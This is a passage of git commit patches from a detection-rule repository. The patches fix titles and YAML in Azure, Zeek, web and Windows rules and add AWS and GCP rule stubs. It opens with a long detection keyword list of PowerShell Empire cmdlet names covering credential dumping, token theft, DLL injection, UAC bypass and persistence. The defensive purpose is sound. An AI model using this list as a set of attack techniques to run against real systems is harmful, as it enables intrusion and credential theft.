'Invoke-ShellCommand' + - 'Start-AgentJob' + - 'Update-Profile' + - 'Get-FilePart' + - 'Encrypt-Bytes' + - 'Decrypt-Bytes' + - 'Encode-Packet' + - 'Decode-Packet' + - 'Send-Message' + - 'Process-Packet' + - 'Process-Tasking' + - 'Get-Task' + - 'Start-Negotiate' + - 'Invoke-DllInjection' + - 'Invoke-ReflectivePEInjection' + - 'Invoke-Shellcode' + - 'Invoke-ShellcodeMSIL' + - 'Get-ChromeDump' + - 'Get-ClipboardContents' + - 'Get-IndexedItem' + - 'Get-Keystrokes' + - 'Invoke-Inveigh' + - 'Invoke-NetRipper' + - 'local:Invoke-PatchDll' + - 'Invoke-NinjaCopy' + - 'Get-Win32Types' + - 'Get-Win32Constants' + - 'Get-Win32Functions' + - 'Sub-SignedIntAsUnsigned' + - 'Add-SignedIntAsUnsigned' + - 'Compare-Val1GreaterThanVal2AsUInt' + - 'Convert-UIntToInt' + - 'Test-MemoryRangeValid' + - 'Write-BytesToMemory' + - 'Get-DelegateType' + - 'Get-ProcAddress' + - 'Enable-SeDebugPrivilege' + - 'Invoke-CreateRemoteThread' + - 'Get-ImageNtHeaders' + - 'Get-PEBasicInfo' + - 'Get-PEDetailedInfo' + - 'Import-DllInRemoteProcess' + - 'Get-RemoteProcAddress' + - 'Copy-Sections' + - 'Update-MemoryAddresses' + - 'Import-DllImports' + - 'Get-VirtualProtectValue' + - 'Update-MemoryProtectionFlags' + - 'Update-ExeFunctions' + - 'Copy-ArrayOfMemAddresses' + - 'Get-MemoryProcAddress' + - 'Invoke-MemoryLoadLibrary' + - 'Invoke-MemoryFreeLibrary' + - 'Out-Minidump' + - 'Get-VaultCredential' + - 'Invoke-DCSync' + - 'Translate-Name' + - 'Get-NetDomain' + - 'Get-NetForest' + - 'Get-NetForestDomain' + - 'Get-DomainSearcher' + - 'Get-NetComputer' + - 'Get-NetGroupMember' + - 'Get-NetUser' + - 'Invoke-Mimikatz' + - 'Invoke-PowerDump' + - 'Invoke-TokenManipulation' + - 'Exploit-JMXConsole' + - 'Exploit-JBoss' + - 'Invoke-Thunderstruck' + - 'Invoke-VoiceTroll' + - 'Set-WallPaper' + - 'Invoke-PsExec' + - 'Invoke-SSHCommand' + - 'Invoke-PSInject' + - 'Invoke-RunAs' + - 'Invoke-SendMail' + - 'Invoke-Rule' + - 'Get-OSVersion' + - 'Select-EmailItem' + - 'View-Email' + - 'Get-OutlookFolder' + - 'Get-EmailItems' + - 'Invoke-MailSearch' + - 'Get-SubFolders' + - 'Get-GlobalAddressList' + - 'Invoke-SearchGAL' + - 'Get-SMTPAddress' + - 'Disable-SecuritySettings' + - 'Reset-SecuritySettings' + - 'Get-OutlookInstance' + - 'New-HoneyHash' + - 'Set-MacAttribute' + - 'Invoke-PatchDll' + - 'Get-SecurityPackages' + - 'Install-SSP' + - 'Invoke-BackdoorLNK' + - 'New-ElevatedPersistenceOption' + - 'New-UserPersistenceOption' + - 'Add-Persistence' + - 'Invoke-CallbackIEX' + - 'Add-PSFirewallRules' + - 'Invoke-EventLoop' + - 'Invoke-PortBind' + - 'Invoke-DNSLoop' + - 'Invoke-PacketKnock' + - 'Invoke-CallbackLoop' + - 'Invoke-BypassUAC' + - 'Get-DecryptedCpassword' + - 'Get-GPPInnerFields' + - 'Invoke-WScriptBypassUAC' + - 'Get-ModifiableFile' + - 'Get-ServiceUnquoted' + - 'Get-ServiceFilePermission' + - 'Get-ServicePermission' + - 'Invoke-ServiceUserAdd' + - 'Invoke-ServiceCMD' + - 'Write-UserAddServiceBinary' + - 'Write-CMDServiceBinary' + - 'Write-ServiceEXE' + - 'Write-ServiceEXECMD' + - 'Restore-ServiceEXE' + - 'Invoke-ServiceStart' + - 'Invoke-ServiceStop' + - 'Invoke-ServiceEnable' + - 'Invoke-ServiceDisable' + - 'Get-ServiceDetail' + - 'Find-DLLHijack' + - 'Find-PathHijack' + - 'Write-HijackDll' + - 'Get-RegAlwaysInstallElevated' + - 'Get-RegAutoLogon' + - 'Get-VulnAutoRun' + - 'Get-VulnSchTask' + - 'Get-UnattendedInstallFile' + - 'Get-Webconfig' + - 'Get-ApplicationHost' + - 'Write-UserAddMSI' + - 'Invoke-AllChecks' + - 'Invoke-ThreadedFunction' + - 'Test-Login' + - 'Get-UserAgent' + - 'Test-Password' + - 'Get-ComputerDetails' + - 'Find-4648Logons' + - 'Find-4624Logons' + - 'Find-AppLockerLogs' + - 'Find-PSScriptsInPSAppLog' + - 'Find-RDPClientConnections' + - 'Get-SystemDNSServer' + - 'Invoke-Paranoia' + - 'Invoke-WinEnum{' + - 'Get-SPN' + - 'Invoke-ARPScan' + - 'Invoke-Portscan' + - 'Invoke-ReverseDNSLookup' + - 'Invoke-SMBScanner' + - 'New-InMemoryModule' + - 'Add-Win32Type' + - 'Export-PowerViewCSV' + - 'Get-MacAttribute' + - 'Copy-ClonedFile' + - 'Get-IPAddress' + - 'Convert-NameToSid' + - 'Convert-SidToName' + - 'Convert-NT4toCanonical' + - 'Get-Proxy' + - 'Get-PathAcl' + - 'Get-NameField' + - 'Convert-LDAPProperty' + - 'Get-NetDomainController' + - 'Add-NetUser' + - 'Add-NetGroupUser' + - 'Get-UserProperty' + - 'Find-UserField' + - 'Get-UserEvent' + - 'Get-ObjectAcl' + - 'Add-ObjectAcl' + - 'Invoke-ACLScanner' + - 'Get-GUIDMap' + - 'Get-ADObject' + - 'Set-ADObject' + - 'Get-ComputerProperty' + - 'Find-ComputerField' + - 'Get-NetOU' + - 'Get-NetSite' + - 'Get-NetSubnet' + - 'Get-DomainSID' + - 'Get-NetGroup' + - 'Get-NetFileServer' + - 'SplitPath' + - 'Get-DFSshare' + - 'Get-DFSshareV1' + - 'Get-DFSshareV2' + - 'Get-GptTmpl' + - 'Get-GroupsXML' + - 'Get-NetGPO' + - 'Get-NetGPOGroup' + - 'Find-GPOLocation' + - 'Get-DomainPolicy' + - 'Get-NetLocalGroup' + - 'Get-NetShare' + - 'Get-NetLoggedon' + - 'Get-NetSession' + - 'Get-NetRDPSession' + - 'Invoke-CheckLocalAdminAccess' + - 'Get-LastLoggedOn' + - 'Get-NetProcess' + - 'Find-InterestingFile' + - 'Invoke-CheckWrite' + - 'Invoke-UserHunter' + - 'Invoke-StealthUserHunter' + - 'Invoke-ProcessHunter' + - 'Invoke-EventHunter' + - 'Invoke-ShareFinder' + - 'Invoke-FileFinder' + - 'Find-LocalAdminAccess' + - 'Get-ExploitableSystem' + - 'Invoke-EnumerateLocalAdmin' + - 'Get-NetDomainTrust' + - 'Get-NetForestTrust' + - 'Find-ForeignUser' + - 'Find-ForeignGroup' + - 'Invoke-MapDomainTrust' + - 'Get-Hex' + - 'Create-RemoteThread' + - 'Get-FoxDump' + - 'Decrypt-CipherText' + - 'Get-Screenshot' + - 'Start-HTTP-Server' + - 'Local:Invoke-CreateRemoteThread' + - 'Local:Get-Win32Functions' + - 'Local:Inject-NetRipper' + - 'GetCommandLine' + - 'ElevatePrivs' + - 'Get-RegKeyClass' + - 'Get-BootKey' + - 'Get-HBootKey' + - 'Get-UserName' + - 'Get-UserHashes' + - 'DecryptHashes' + - 'DecryptSingleHash' + - 'Get-UserKeys' + - 'DumpHashes' + - 'Enable-SeAssignPrimaryTokenPrivilege' + - 'Enable-Privilege' + - 'Set-DesktopACLs' + - 'Set-DesktopACLToAllowEveryone' + - 'Get-PrimaryToken' + - 'Get-ThreadToken' + - 'Get-TokenInformation' + - 'Get-UniqueTokens' + - 'Find-GPOComputerAdmin' + - 'Invoke-ImpersonateUser' + - 'Create-ProcessWithToken' + - 'Free-AllTokens' + - 'Enum-AllTokens' + - 'Invoke-RevertToSelf' + - 'Set-Speaker(\$Volume){\$wshShell' + - 'Local:Get-RandomString' + - 'Local:Invoke-PsExecCmd' + - 'Get-GPPPassword' + - 'Local:Inject-BypassStuff' + - 'Local:Invoke-CopyFile\(\$sSource,' + - 'ind-Fruit' + - 'New-IPv4Range' + - 'New-IPv4RangeFromCIDR' + - 'Parse-Hosts' + - 'Parse-ILHosts' + - 'Exclude-Hosts' + - 'Get-TopPort' + - 'Parse-Ports' + - 'Parse-IpPorts' + - 'Remove-Ports' + - 'Write-PortscanOut' + - 'Convert-SwitchtoBool' + - 'Get-ForeignUser' + - 'Get-ForeignGroup' condition: selection1 or selection2 \ No newline at end of file diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml index e3fe87b9..daf67003 100644 --- a/rules/windows/builtin/win_user_acc_added_removed.yml +++ b/rules/windows/builtin/win_user_acc_added_removed.yml @@ -1,7 +1,9 @@ title: Account added and removed from privileged groups id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60 -description: 'Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise.' -references: Azure Sentinel +description: Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise. +references: + - Azure Sentinel +date: 2021/08/15 level: low logsource: service: Security diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml index a6cd343c..7751dd33 100644 --- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml +++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml @@ -1,8 +1,9 @@ title: User account enabled and disabled id: 3d023f64-8225-41a2-9570-2bd7c2c4535e -description: 'Identifies when a user account is enabled and then disabled. This can be an indication of compromise and - an adversary attempting to hide in the noise.' -references: Azure Sentinel +description: Identifies when a user account is enabled and then disabled. This can be an indication of compromise and an adversary attempting to hide in the noise. +references: + - Azure Sentinel +date: 2021/08/15 level: medium logsource: service: Security diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml index 639debc5..264ac030 100644 --- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml +++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml @@ -1,8 +1,9 @@ title: New user created and added to the built-in administrators group id: aa1eff90-29d4-49dc-a3ea-b65199f516db -description: 'Identifies when a user account was created and then added to the builtin Administrators group. - This should be monitored closely and all additions reviewed.' -references: Azure Sentinel +description: Identifies when a user account was created and then added to the builtin Administrators group. This should be monitored closely and all additions reviewed. +references: + - Azure Sentinel +date: 2021/08/15 level: low logsource: service: Security From c3457c9911691314ca348dfc264fe7682418abd0 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 15 Aug 2021 19:05:00 +0200 Subject: [PATCH 0355/1367] fix titles --- .../azure/azure_creating_number_of_resources_detection.yml | 2 +- rules/cloud/azure/azure_granting_permission_detection.yml | 2 +- rules/network/zeek/zeek_dns_mining_pools.yml | 2 +- rules/network/zeek/zeek_dns_torproxy.yml | 2 +- rules/web/sql_injection_keywords.yml | 2 +- rules/web/xss_keywords.yml | 2 +- rules/windows/builtin/win_event_log_cleared.yml | 2 +- rules/windows/builtin/win_powershelll_empire.yml | 2 +- rules/windows/builtin/win_user_acc_added_removed.yml | 2 +- rules/windows/builtin/win_user_acc_enabled_disabled.yml | 2 +- .../windows/builtin/win_user_created_added_to_bultin_admins.yml | 2 +- 11 files changed, 11 insertions(+), 11 deletions(-) diff --git a/rules/cloud/azure/azure_creating_number_of_resources_detection.yml b/rules/cloud/azure/azure_creating_number_of_resources_detection.yml index d1a60829..74041d51 100644 --- a/rules/cloud/azure/azure_creating_number_of_resources_detection.yml +++ b/rules/cloud/azure/azure_creating_number_of_resources_detection.yml @@ -1,4 +1,4 @@ -title: number of resource creation or deployment activities +title: Number Of Resource Creation Or Deployment Activities id: d2d901db-7a75-45a1-bc39-0cbf00812192 status: experimental author: sawwinnnaung diff --git a/rules/cloud/azure/azure_granting_permission_detection.yml b/rules/cloud/azure/azure_granting_permission_detection.yml index cf644a6b..1a93acee 100644 --- a/rules/cloud/azure/azure_granting_permission_detection.yml +++ b/rules/cloud/azure/azure_granting_permission_detection.yml @@ -1,4 +1,4 @@ -title: Granting of permissions to an account +title: Granting Of Permissions To An Account id: a622fcd2-4b5a-436a-b8a2-a4171161833c status: experimental author: sawwinnnaung diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 0de24200..c6b4cde5 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -1,5 +1,5 @@ +title: DNS Events Related To Mining Pools id: bf74135c-18e8-4a72-a926-0e4f47888c19 -title: DNS events related to mining pools description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools. references: - Azure Sentinel diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml index 466ab203..b3f89c18 100644 --- a/rules/network/zeek/zeek_dns_torproxy.yml +++ b/rules/network/zeek/zeek_dns_torproxy.yml @@ -1,5 +1,5 @@ +title: DNS TOR Proxies id: a8322756-015c-42e7-afb1-436e85ed3ff5 -title: DNS tor proxies description: Identifies IPs performing DNS lookups associated with common Tor proxies. references: - Azure Sentinel diff --git a/rules/web/sql_injection_keywords.yml b/rules/web/sql_injection_keywords.yml index f1dd7972..f3d8985f 100644 --- a/rules/web/sql_injection_keywords.yml +++ b/rules/web/sql_injection_keywords.yml @@ -1,4 +1,4 @@ -title: Detect sql injection by keywords +title: Detect Sql Injection By Keywords id: 5513deaf-f49a-46c2-a6c8-3f111b5cb453 status: experimental description: Detects sql injection that use GET requests by keyword searches in URL strings diff --git a/rules/web/xss_keywords.yml b/rules/web/xss_keywords.yml index 775ec871..c5d1470f 100644 --- a/rules/web/xss_keywords.yml +++ b/rules/web/xss_keywords.yml @@ -1,4 +1,4 @@ -title: Detect XSS Attempts by keywords +title: Detect XSS Attempts By Keywords id: 65354b83-a2ea-4ea6-8414-3ab38be0d409 status: experimental description: Detects XSS that use GET requests by keyword searches in URL strings diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 0fdbdd54..f8c56070 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -1,5 +1,5 @@ +title: Security Event Log Cleared id: a122ac13-daf8-4175-83a2-72c387be339d -title: Security Event log cleared status: experimental description: Checks for event id 1102 which indicates the security event log was cleared. references: diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml index 8aa638ef..6dc937fe 100644 --- a/rules/windows/builtin/win_powershelll_empire.yml +++ b/rules/windows/builtin/win_powershelll_empire.yml @@ -1,4 +1,4 @@ -title: Powershell Empire cmdlets seen in command line +title: Powershell Empire Cmdlets Seen In Command Line id: ef88eb96-861c-43a0-ab16-f3835a97c928 description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data. references: diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml index daf67003..f8ee4d37 100644 --- a/rules/windows/builtin/win_user_acc_added_removed.yml +++ b/rules/windows/builtin/win_user_acc_added_removed.yml @@ -1,4 +1,4 @@ -title: Account added and removed from privileged groups +title: Account Added And Removed From Privileged Groups id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60 description: Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise. references: diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml index 7751dd33..72857cbc 100644 --- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml +++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml @@ -1,4 +1,4 @@ -title: User account enabled and disabled +title: User Account Enabled And Disabled id: 3d023f64-8225-41a2-9570-2bd7c2c4535e description: Identifies when a user account is enabled and then disabled. This can be an indication of compromise and an adversary attempting to hide in the noise. references: diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml index 264ac030..3eb3c977 100644 --- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml +++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml @@ -1,4 +1,4 @@ -title: New user created and added to the built-in administrators group +title: New Uer Created And Added To The Built-in Administrators Group id: aa1eff90-29d4-49dc-a3ea-b65199f516db description: Identifies when a user account was created and then added to the builtin Administrators group. This should be monitored closely and all additions reviewed. references: From 0de1949c59750c626cf1f3e6950c13479ac99b2e Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 15 Aug 2021 19:11:43 +0200 Subject: [PATCH 0356/1367] fix azure_rare_operations.yml --- rules/cloud/azure/azure_rare_operations.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/cloud/azure/azure_rare_operations.yml b/rules/cloud/azure/azure_rare_operations.yml index caa65c03..1796dd12 100644 --- a/rules/cloud/azure/azure_rare_operations.yml +++ b/rules/cloud/azure/azure_rare_operations.yml @@ -1,4 +1,4 @@ -title: Rare subscription-level operations in Azure +title: Rare Subscription-level Operations In Azure id: c1182e02-49a3-481c-b3de-0fadc4091488 status: experimental author: sawwinnnaung @@ -9,14 +9,14 @@ references: logsource: service: AzureActivity detection: - keywords: -Microsoft.DocumentDB/databaseAccounts/listKeys/action + keywords: + -Microsoft.DocumentDB/databaseAccounts/listKeys/action -Microsoft.Maps/accounts/listKeys/action -Microsoft.Media/mediaservices/listKeys/action -Microsoft.CognitiveServices/accounts/listKeys/action -Microsoft.Storage/storageAccounts/listKeys/action -Microsoft.Compute/snapshots/write -Microsoft.Network/networkSecurityGroups/write - condition: keywords level: medium falsepositives: From 050fb2b77df50a1bd8294890b253fe0897d5148a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 15 Aug 2021 19:17:56 +0200 Subject: [PATCH 0357/1367] fix more errors --- .../azure/azure_granting_permission_detection.yml | 1 - rules/cloud/azure/azure_rare_operations.yml | 14 +++++++------- 2 files changed, 7 insertions(+), 8 deletions(-) diff --git a/rules/cloud/azure/azure_granting_permission_detection.yml b/rules/cloud/azure/azure_granting_permission_detection.yml index 1a93acee..2cfb1fe8 100644 --- a/rules/cloud/azure/azure_granting_permission_detection.yml +++ b/rules/cloud/azure/azure_granting_permission_detection.yml @@ -11,7 +11,6 @@ logsource: detection: keywords: - Microsoft.Authorization/roleAssignments/write - condition: keywords level: medium falsepositives: diff --git a/rules/cloud/azure/azure_rare_operations.yml b/rules/cloud/azure/azure_rare_operations.yml index 1796dd12..49ae1bb7 100644 --- a/rules/cloud/azure/azure_rare_operations.yml +++ b/rules/cloud/azure/azure_rare_operations.yml @@ -10,13 +10,13 @@ logsource: service: AzureActivity detection: keywords: - -Microsoft.DocumentDB/databaseAccounts/listKeys/action - -Microsoft.Maps/accounts/listKeys/action - -Microsoft.Media/mediaservices/listKeys/action - -Microsoft.CognitiveServices/accounts/listKeys/action - -Microsoft.Storage/storageAccounts/listKeys/action - -Microsoft.Compute/snapshots/write - -Microsoft.Network/networkSecurityGroups/write + - Microsoft.DocumentDB/databaseAccounts/listKeys/action + - Microsoft.Maps/accounts/listKeys/action + - Microsoft.Media/mediaservices/listKeys/action + - Microsoft.CognitiveServices/accounts/listKeys/action + - Microsoft.Storage/storageAccounts/listKeys/action + - Microsoft.Compute/snapshots/write + - Microsoft.Network/networkSecurityGroups/write condition: keywords level: medium falsepositives: From a0df8ce84c381080f6c98aab370bc90211d65621 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:26:48 -0500 Subject: [PATCH 0358/1367] Create aws_efs_fileshare_mount_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml @@ -0,0 +1 @@ + From bde91611a9556e249b250d13bf2c192acfa9c501 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:27:22 -0500 Subject: [PATCH 0359/1367] Create aws_efs_fileshare_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml @@ -0,0 +1 @@ + From ba8e9c9fcbaa0406f78e34148339a6fdaed1f33f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:28:10 -0500 Subject: [PATCH 0360/1367] Create gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -0,0 +1 @@ + From 7605795a9fc6e4bb750ef5a26d6c284cf925b479 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:30:23 -0500 Subject: [PATCH 0361/1367] Create gcp_dns_zone_modified_or_deleted.yml --- rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml @@ -0,0 +1 @@ + From b0f6f1130927da3a6f422cfb8795cc8fc53a5f3e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:31:04 -0500 Subject: [PATCH 0362/1367] Create aws_s3_control_modified_or_deleted.yml --- rules/cloud/aws/aws_s3_control_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_s3_control_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml b/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml @@ -0,0 +1 @@ + From 5f2160c1b2bf792c97435b6c50ae486b51a34815 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:32:12 -0500 Subject: [PATCH 0363/1367] Delete aws_s3_control_modified_or_deleted.yml --- rules/cloud/aws/aws_s3_control_modified_or_deleted.yml | 1 - 1 file changed, 1 deletion(-) delete mode 100644 rules/cloud/aws/aws_s3_control_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml b/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml deleted file mode 100644 index 8b137891..00000000 --- a/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml +++ /dev/null @@ -1 +0,0 @@ - From 532f9129917f0e0e967edf5efd0fc965f3ae2f50 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:33:28 -0500 Subject: [PATCH 0364/1367] Create aws_eks_cluster_modified_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml @@ -0,0 +1 @@ + From d6bbdf2750d69529468fa1615033a97d3888c6da Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:33:35 -0500 Subject: [PATCH 0365/1367] Delete aws_eks_cluster_modified_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml | 1 - 1 file changed, 1 deletion(-) delete mode 100644 rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml deleted file mode 100644 index 8b137891..00000000 --- a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml +++ /dev/null @@ -1 +0,0 @@ - From cfb6f4e4fb7129dabf139cdc851db349f2e48b0e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:33:44 -0500 Subject: [PATCH 0366/1367] Create aws_eks_cluster_modified_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml @@ -0,0 +1 @@ + From 3d332b81712b6af63204aeddba6f201ebe6ef867 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:37:08 -0500 Subject: [PATCH 0367/1367] Create gcp_vpn_tunnel_modified_or_deleted.yml --- rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml new file mode 100644 index 00000000..139597f9 --- /dev/null +++ b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml @@ -0,0 +1,2 @@ + + From db7d2958d31b3329978b423bf7ae34530d4d26f9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 15:04:24 -0500 Subject: [PATCH 0368/1367] Update aws_efs_fileshare_mount_modified_or_deleted.yml --- ...fs_fileshare_mount_modified_or_deleted.yml | 21 ++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml index 8b137891..fee2a025 100644 --- a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml @@ -1 +1,20 @@ - +title: AWS EFS Fileshare Mount Modified or Deleted +id: 6a7ba45c-63d8-473e-9736-2eaabff79964 +status: experimental +description: Detects when a EFS Fileshare Mount is modified or deleted. This will break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. +author: austin Songer @austinsonger +date: 2021/08/15 +references: + - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html +logsource: + service: cloudtrail +detection: + selection: + eventSource: elasticfilesystem.amazonaws.com + eventName: DeleteMountTarget + condition: selection +falsepositives: + - unknown +level: medium +tags: + - attack.impact From b5766f88048cef8dad2bd349c00acfdbe948b7df Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 15:36:34 -0500 Subject: [PATCH 0369/1367] Update aws_efs_fileshare_modified_or_deleted.yml --- .../aws_efs_fileshare_modified_or_deleted.yml | 21 ++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml index 8b137891..ea53d709 100644 --- a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml @@ -1 +1,20 @@ - +title: AWS EFS Fileshare Modified or Deleted +id: 6a7ba45c-63d8-473e-9736-2eaabff79964 +status: experimental +description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, you must first delete them, so deletion of a mount will occur before deletion of a Fileshare. +author: austin Songer @austinsonger +date: 2021/08/15 +references: + - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html +logsource: + service: cloudtrail +detection: + selection: + eventSource: elasticfilesystem.amazonaws.com + eventName: DeleteFileSystem + condition: selection +falsepositives: + - unknown +level: medium +tags: + - attack.impact From 28f6cbe2b8ccef4bf6113b112b0c5150463a4dc1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 15:37:07 -0500 Subject: [PATCH 0370/1367] Update aws_efs_fileshare_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml 